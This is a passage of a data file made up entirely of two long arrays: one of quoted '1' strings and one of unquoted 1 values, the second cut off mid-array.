,"1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1"]
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1